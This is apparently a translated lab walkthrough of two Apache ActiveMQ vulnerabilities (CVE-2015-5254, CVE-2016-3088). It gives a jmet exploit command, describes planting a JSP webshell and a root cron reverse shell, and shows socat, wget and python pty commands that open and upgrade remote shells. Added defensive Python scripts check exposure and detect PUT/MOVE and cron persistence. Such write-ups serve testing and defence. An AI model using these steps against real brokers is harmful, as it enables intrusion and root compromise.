0x00 About
Apache ActiveMQ is an open-source message-oriented middleware developed by the Apache Software Foundation. It supports the Java Message Service (JMS), clustering, the Spring Framework, and more.
0x01 Environment setup
ActiveMQ version used in this article: 5.11.0
Download: http://activemq.apache.org/activemq-5110-release.html
Unpack the archive.
Start the broker with ./bin/activemq start, then run netstat -ntlp | grep 8161 to check that it started successfully (8161 is the default port).
0x02 Deserialization vulnerability (CVE-2015-5254)
Apache ActiveMQ 5.x before version 5.13.0 has a security vulnerability that stems from the broker not restricting which classes it will deserialize. A remote attacker can use a specially crafted Java Message Service (JMS) ObjectMessage object to exploit this vulnerability and execute arbitrary code.
8161 is the default ActiveMQ web management port; 61616 is the default ActiveMQ message queue port.
jmet is used to exploit the vulnerability. jmet download:
https://github.com/matthiaskaiser/jmet/releases
Use jmet to construct a queue named event:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "payload" -Yp ROME 192.168.124.128 61616
Error: create an external folder inside the jmet directory.
Configure the payload so that the deserialized message sent to the message queue spawns a reverse shell.
Message:
The message is triggered when it is clicked:
0x03 Arbitrary file write vulnerability (CVE-2016-3088)
This vulnerability affects Apache ActiveMQ 5.x up to 5.14.0, but in versions 5.12.x to 5.13.x the fileserver application is already disabled by default (it can be enabled in conf/jetty.xml). From version 5.14.0 onward the fileserver application was removed entirely.
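As an added example (not part of the original article and not ActiveMQ's own code), the following Python script classifies a broker against CVE-2016-3088 using the version ranges stated above, and checks whether the fileserver context is actually enabled in conf/jetty.xml rather than trusting the version alone. The jetty.xml fragments are constructed for this example: the bean layout is an assumption modelled on the Jetty WebAppContext style ActiveMQ's jetty.xml uses, and a commented-out bean is treated as disabled, which is how the 5.12.x to 5.13.x releases ship it.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of a conf/jetty.xml fragment with the fileserver
# application enabled. The bean/property layout is an assumption for this
# example, not a copy of the project's shipped file.
JETTY_XML_ENABLED = """<beans>
  <bean id="admin" class="org.eclipse.jetty.webapp.WebAppContext">
    <property name="contextPath" value="/admin" />
    <property name="resourceBase" value="${activemq.home}/webapps/admin" />
  </bean>
  <bean id="fileserver" class="org.eclipse.jetty.webapp.WebAppContext">
    <property name="contextPath" value="/fileserver" />
    <property name="resourceBase" value="${activemq.home}/webapps/fileserver" />
  </bean>
</beans>
"""

# The same fragment with the fileserver bean commented out (the default in
# 5.12.x to 5.13.x). ElementTree drops XML comments, so the bean disappears.
JETTY_XML_DISABLED = JETTY_XML_ENABLED.replace(
    '<bean id="fileserver"', '<!-- <bean id="fileserver"'
).replace(
    '${activemq.home}/webapps/fileserver" />\n  </bean>',
    '${activemq.home}/webapps/fileserver" />\n  </bean> -->',
)


def fileserver_enabled(jetty_xml: str) -> bool:
    """Return True if an uncommented WebAppContext bean serves /fileserver."""
    root = ET.fromstring(jetty_xml)
    for bean in root.iter("bean"):
        if not bean.get("class", "").endswith("WebAppContext"):
            continue
        for prop in bean.findall("property"):
            if prop.get("name") == "contextPath" and prop.get("value") == "/fileserver":
                return True
    return False


def parse_version(version: str) -> tuple:
    """'5.11.0' -> (5, 11, 0); tolerates suffixes such as '5.13.0-SNAPSHOT'."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def fileserver_exposure(version: str, jetty_xml: str) -> str:
    """Classify a broker for CVE-2016-3088 from its version and jetty.xml."""
    ver = parse_version(version)
    if ver[:1] != (5,):
        return "unknown: version ranges in this article cover 5.x only"
    if ver >= (5, 14, 0):
        return "not affected: fileserver application removed in 5.14.0"
    if not fileserver_enabled(jetty_xml):
        return "not exposed: fileserver context not enabled in jetty.xml"
    return "exposed: fileserver enabled on an affected 5.x release"


if __name__ == "__main__":
    for ver, xml in (("5.11.0", JETTY_XML_ENABLED), ("5.13.0", JETTY_XML_DISABLED),
                     ("5.13.0", JETTY_XML_ENABLED), ("5.14.0", JETTY_XML_ENABLED)):
        print(ver, "->", fileserver_exposure(ver, xml))
```

The point of the jetty.xml check is the 5.12.x to 5.13.x case: the release is in the affected range, but the broker is only exposed if an administrator has uncommented the fileserver bean, so an inventory that keys on version alone over-reports there.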
The FileServer service in ActiveMQ allows users to upload files to a specified directory via the HTTP PUT method. FileServer is an interface for storing files. FileServer supports writing files (it does not parse JSP) but also supports moving files (MOVE), so a JSP file can be PUT to the FileServer and then moved with a MOVE request into a directory where it executes, and accessed there.
Upload test with the PUT method:
Successful access shows that the file has been PUT. A JSP webshell (small or large) can be PUT directly and moved to a directory that parses JSP to get a shell. Both webapps/api/ and webapps/admin/ parse JSP. To move the file into a parsable directory, however, the absolute path is needed.
Two ways to obtain the absolute path:
1. Visit http://ip:8161/admin/test/systemProperties.jsp
2. Construct an invalid upload path so the error discloses the absolute path (this did not succeed on this version; other versions can be tested)
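Added example, not from the original page: a small detector that runs over constructed NCSA-style request log lines (the format Jetty's request log writes; the client IP, timestamps, paths and sizes are made up) and flags PUT and MOVE requests against /fileserver/, then correlates a PUT followed by a MOVE of the same path from the same client, which is the upload-then-move sequence described above.

```python
import re
from collections import namedtuple

# Constructed request log lines in NCSA common format. Everything here
# (client address, times, paths, sizes) is invented for the example.
SAMPLE_LOG = """\
192.168.124.1 - - [02/Mar/2018:14:01:12 +0800] "GET /admin/ HTTP/1.1" 200 5213
192.168.124.1 - - [02/Mar/2018:14:02:40 +0800] "PUT /fileserver/test.txt HTTP/1.1" 204 0
192.168.124.1 - - [02/Mar/2018:14:03:05 +0800] "GET /admin/test/systemProperties.jsp HTTP/1.1" 200 11804
192.168.124.1 - - [02/Mar/2018:14:03:31 +0800] "PUT /fileserver/test.jsp HTTP/1.1" 204 0
192.168.124.1 - - [02/Mar/2018:14:03:52 +0800] "MOVE /fileserver/test.jsp HTTP/1.1" 204 0
192.168.124.1 - - [02/Mar/2018:14:04:10 +0800] "GET /admin/test.jsp HTTP/1.1" 200 38
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

Finding = namedtuple("Finding", "ip time method path severity reason")


def classify(method: str, path: str):
    """Return (severity, reason) for one request, or None if it is benign."""
    if not path.startswith("/fileserver/"):
        return None
    if method == "MOVE":
        return ("high", "MOVE on fileserver: file relocated out of the upload directory")
    if method == "PUT":
        if path.lower().endswith((".jsp", ".jspx")):
            return ("high", "PUT of a JSP file to fileserver")
        return ("medium", "PUT to fileserver: arbitrary file write")
    return None


def scan_log(text: str) -> list:
    """Parse each log line and collect findings in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        verdict = classify(m["method"], m["path"])
        if verdict:
            findings.append(Finding(m["ip"], m["time"], m["method"], m["path"], *verdict))
    return findings


def upload_move_sequences(findings: list) -> list:
    """Paths that one client first PUT and later MOVEd, in log order."""
    seen_put = set()
    sequences = []
    for f in findings:
        key = (f.ip, f.path)
        if f.method == "PUT":
            seen_put.add(key)
        elif f.method == "MOVE" and key in seen_put:
            sequences.append(f.path)
    return sequences


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"[{f.severity}] {f.ip} {f.time} {f.method} {f.path}: {f.reason}")
    print("PUT-then-MOVE:", upload_move_sequences(found))
```

The request log does not record the Destination header of a MOVE, so the destination path cannot be recovered from this source alone; the PUT-then-MOVE correlation is what makes the sequence stand out, and any MOVE on the fileserver context is worth an alert on a broker that should not be serving it at all.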
Upload the webshell:
Using the obtained absolute path, move the file under the web directory to /root/apache-activemq-5.11.0/webapps/admin/test.jsp
Access the shell (login required; default credentials admin/admin)
In the same way an SSH key can be written for public-key login.
Write a crontab entry for a reverse shell (requires ActiveMQ to run as root):
Move the file to /etc/cron.d/root
Listen and receive the shell
Crontab scheduled task
The file is written into /etc/cron.d/
Field order: minute hour day month week command, i.e. minute, hour, day of month, month, day of week, then the command; "* * * * * command" runs the command every minute.
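Added example, not from the original page: a Python audit of /etc/cron.d contents that applies the field order just described to flag the two things a defender would look for after such a write, an every-minute schedule and a root job whose command lives in a world-writable directory. The file contents are constructed for the example; note that files in /etc/cron.d, unlike a user's crontab, carry a user name between the five time fields and the command, so the parser expects six fields before the command text.

```python
import re

# Constructed contents of two files in /etc/cron.d. The first is ordinary
# housekeeping; the second is an every-minute root job pointing at /tmp,
# a placeholder command for this example.
CRON_D_FILES = {
    "/etc/cron.d/logrotate-example": "15 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
    "/etc/cron.d/root": "SHELL=/bin/bash\n* * * * * root /tmp/.x.sh\n",
}

# Directories any user can write to; a root job executing from here is a
# classic persistence indicator.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
ENV_LINE = re.compile(r"^[A-Za-z_]\w*=")


def parse_cron_d_line(line: str):
    """Return (schedule_fields, user, command) or None for blank, comment or VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    parts = line.split(None, 6)  # minute hour day month week user command...
    if len(parts) < 7:
        return None
    return parts[:5], parts[5], parts[6]


def every_minute(schedule: list) -> bool:
    """True when all five time fields are '*', i.e. the job fires every minute."""
    return all(field == "*" for field in schedule)


def audit_cron_d(files: dict) -> list:
    """Return (path, line, reasons) for each entry that trips a heuristic."""
    findings = []
    for path, text in files.items():
        for line in text.splitlines():
            parsed = parse_cron_d_line(line)
            if parsed is None:
                continue
            schedule, user, command = parsed
            reasons = []
            if every_minute(schedule):
                reasons.append("runs every minute")
            if user == "root" and any(d in command for d in SUSPICIOUS_DIRS):
                reasons.append("root executes a command from a world-writable directory")
            if reasons:
                findings.append((path, line.strip(), reasons))
    return findings


if __name__ == "__main__":
    for path, line, reasons in audit_cron_d(CRON_D_FILES):
        print(f"{path}: {line!r} -> {', '.join(reasons)}")
```

On a real host the dictionary would be filled by reading /etc/cron.d, and the file modification time is worth recording alongside each finding, since a fresh file there on a machine running ActiveMQ as root is exactly the artifact the write-to-cron path above leaves behind.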
0x04 TIPS
Usually when we test a reverse shell the resulting shell is very basic: a mistyped command can mean losing the shell, there is no tab completion, no vim, and so on. Very unfriendly!
Several methods for obtaining a fully interactive shell are shared below:
1. Using the Python pty module, a pseudo-terminal can be spawned. After receiving the reverse shell, execute:
python -c 'import pty; pty.spawn("/bin/bash")'
2. Use socat
Socat is a tool as powerful as nc for TCP connections and can establish a complete tty. If socat is installed on the victim server it can be used to spawn the reverse shell. If it is not installed, fetch it with the following command:
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat;chmod +x socat
Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:4444
3. netcat magic
First, get a shell with the Python pty method from step 1.
Then press Ctrl-Z to return to the local shell.
Check the current terminal and stty information:
The information needed is the terminal type (xterm) and the current stty size (rows 33; columns 191).
With the shell still running in the background, set the current stty to raw mode and turn off echo of typed characters.
Bring the shell back to the foreground with fg and reset the terminal with reset.
Finally, supply the collected terminal type and stty size to the shell.
Reference link: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys